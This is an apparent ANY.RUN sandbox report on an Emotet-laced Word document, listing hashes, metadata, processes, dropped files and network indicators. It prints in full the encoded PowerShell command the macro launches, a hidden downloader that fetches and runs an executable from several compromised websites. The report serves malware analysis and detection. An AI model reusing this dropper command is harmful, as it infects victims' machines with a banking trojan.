analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan_1156964433DE_Mai_20_2019.doc

Full analysis: https://app.any.run/tasks/dfb9e99b-5cbf-410e-b00b-05fbd2c2b621
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 10:29:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: indexing, Subject: Automated, Author: Camille Harvey, Comments: Bedfordshire redefine Senior, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 08:57:00 2019, Last Saved Time/Date: Mon May 20 08:57:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 62, Security: 0
MD5:

440A8C54390E0C2963A2B8E1E922B501

SHA1:

B16CDF0741018554800E62064F5E4B687B8FF8AF

SHA256:

C5A0B5B5DD17588A8D9AC64D9FCCABDEBADC31B749534B1E2745FB69F70F958D

SSDEEP:

3072:r077HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfW22snSs6t0y:I77HUUUUUUUUUUUUUUUUUUUT52VMW221

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1920)
    • Executed via WMI

      • powershell.exe (PID: 1920)
    • PowerShell script executed

      • powershell.exe (PID: 1920)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3516)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: indexing
Subject: Automated
Author: Camille Harvey
Keywords: -
Comments: Bedfordshire redefine Senior
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 07:57:00
ModifyDate: 2019:05:20 07:57:00
Pages: 1
Words: 10
Characters: 62
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Zieme - Hagenes
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 71
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hamill
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3516"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Scan_1156964433DE_Mai_20_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1920powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABUADcAXwA2ADQANQAzADMAPQAnAGMAXwA3ADQANQA3ADcAJwA7ACQATgAzADkANQBfAF8ANgA1ACAAPQAgACcAMgA0ACcAOwAkAG4AMAAyADIAXwA0ADEAPQAnAGMAMwA0ADgANgA3ADEAMQAnADsAJABrADgAMwA3AF8AMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAzADkANQBfAF8ANgA1ACsAJwAuAGUAeABlACcAOwAkAHIANQA4ADEAMAAzAD0AJwBWADEANAA1ADYANwBfACcAOwAkAE0AMgAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAYABUAC4AVwBFAEIAQwBgAEwAYABJAGAARQBuAFQAOwAkAEIAMgA4ADgANgAwADMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AaQBuAHAAcgBpAG4AdABlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHkAcgBrAHYAbQA0AHYAeQB5AF8AeQBiAGkAZABiAC0ANAAzADcANAA1ADIAMAA3AC8AQABoAHQAdABwADoALwAvAHMAYQBuAHQAdQBhAHIAaQBvAGEAcABhAHIAZQBjAGkAZABhAG0AbwBuAHQAZQBzAGUALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADcAagBuADkAcAA3AF8AcQBvAHUANAA5AGIAagBvAGQAeAAtADMAMwA5ADUAMwAvAEAAaAB0AHQAcAA6AC8ALwBzAGUAcgB3AGkAcwBrAG8AbgBzAG8AbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoARQBzAGYAWQB1AGkAUABNAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHAAZABpAGEAbQBvAG4AZABzAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0ANAA1AHoAdgAwADMANwB1AGMAXwBuAGUAbgB0ADgANQBkAGEAYQBpAC0AMgA4ADIAMAA2ADcALwBAAGgAdAB0AHAAOgAvAC8AYQB3AG8AcgBsAGQAdABvAHUAcgBpAHMAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMQBmAGMAagBjADgAXwBtADQAbABuAGoANwBmAGYAbgBnAC0ANwA1ADUAMQAwADAALwAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAVgAwADYAXwA0AF8ANQA9ACcATgA0ADEAOQA0ADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGsAOQA2ADgAOAAyADYAXwAgAGkAbgAgACQAQgAyADgAOAA2ADAAMwApAHsAdAByAHkAewAkAE0AMgAxADQAMQA4AC4AZABPAHcAbgBsAG8AYQBkAGYASQBMAGUAKAAkAGsAOQA2ADgAOAAyADYAXwAsACAAJABrADgAMwA3AF8AMAApADsAJAB6ADEAMQAwADQAXwA4ADgAPQAnAGIAMwA5ADgAOAA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAawA4ADMANwBfADAAKQAuAEwARQBOAGcAdABIACAALQBnAGUAIAAyADEAMgA1ADgAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAawA4ADMANwBfADAAOwAkAGoANAA2ADUANAA5AD0AJwB2ADcAOAA4ADAAMQA5ADgAJwA7AGIAcgBlAGEAawA7ACQAaQAyAF8AOQAzADkAPQAnAEUANQA3ADgAOAA4ADgANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADgAOAAyADgAMQA5AD0AJwBjADgAMgAxADEAMAAzADUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 362
Read events
883
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3F3F.tmp.cvr
MD5:
SHA256:
1920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXJGO9Y2XC2JCCX5PHQB.temp
MD5:
SHA256:
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C95CF016.wmfwmf
MD5:60A27A4FCF5CE247AAE00D367D0D22B2
SHA256:F3751338CBF4BA78340D09B65DD4177598527A17E6965833175393372A63B537
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:9FCE4C0FC69E4521740BE8946F49BBD2
SHA256:834F20678C86C55249FC8A23716D07B232041D65E84C3150E4436198FF1809BE
3516WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Scan_1156964433DE_Mai_20_2019.doc.LNKlnk
MD5:B0DBE31B01C45DE50822FB0A18B12A0D
SHA256:2934FA91FAB60908FFC98E0BB84CC56B33D0F0FC72BCD7D1E5F56202537E4132
1920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D38BCC94.wmfwmf
MD5:1A963D8397FDD7B65F94440211DEE775
SHA256:1F4936D119D1BE5DEFD7E6304C36AD492BB7E243EBA8E346C280DDD32A5E7AA7
3516WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AB48D90461BFD40D52CF5A42E8EA84D8
SHA256:7B74D02329C9DC5B64C4AB2CBBD0591D0996AC57DCC90A6FAD7540F70B01DF4C
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF6BF829.wmfwmf
MD5:12749EE7DA290892EEE06700CF24DA98
SHA256:40481E7A1708403333B431446E2801482DF48F5E18925AAB00415A8F42A1CF54
3516WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:59BCA07A0594A19C48419B379996A0CD
SHA256:B6017BC5853A2D026F345C84DE29A0AFCFECC32F4009933C8E01BB3529A4F65F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1920
powershell.exe
GET
404
171.22.26.29:80
http://saminprinter.com/wp-includes/yrkvm4vyy_ybidb-43745207/
GB
xml
345 b
suspicious
1920
powershell.exe
GET
404
199.250.205.232:80
http://aworldtourism.com/wp-includes/1fcjc8_m4lnj7ffng-755100/
US
xml
345 b
malicious
1920
powershell.exe
GET
404
54.38.130.145:80
http://serwiskonsol.com/wp-content/JEsfYuiPMv/
FR
xml
345 b
unknown
1920
powershell.exe
GET
404
192.99.62.163:80
http://santuarioaparecidamontese.com.br/wp-includes/7jn9p7_qou49bjodx-33953/
CA
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1920
powershell.exe
104.27.178.199:443
ppdiamonds.co
Cloudflare Inc
US
shared
1920
powershell.exe
171.22.26.29:80
saminprinter.com
GB
suspicious
1920
powershell.exe
192.99.62.163:80
santuarioaparecidamontese.com.br
OVH SAS
CA
unknown
1920
powershell.exe
54.38.130.145:80
serwiskonsol.com
OVH SAS
FR
unknown
1920
powershell.exe
199.250.205.232:80
aworldtourism.com
US
unknown

DNS requests

Domain
IP
Reputation
saminprinter.com
  • 171.22.26.29
suspicious
santuarioaparecidamontese.com.br
  • 192.99.62.163
suspicious
serwiskonsol.com
  • 54.38.130.145
unknown
ppdiamonds.co
  • 104.27.178.199
  • 104.27.179.199
suspicious
aworldtourism.com
  • 199.250.205.232
malicious

Threats

No threats detected
No debug info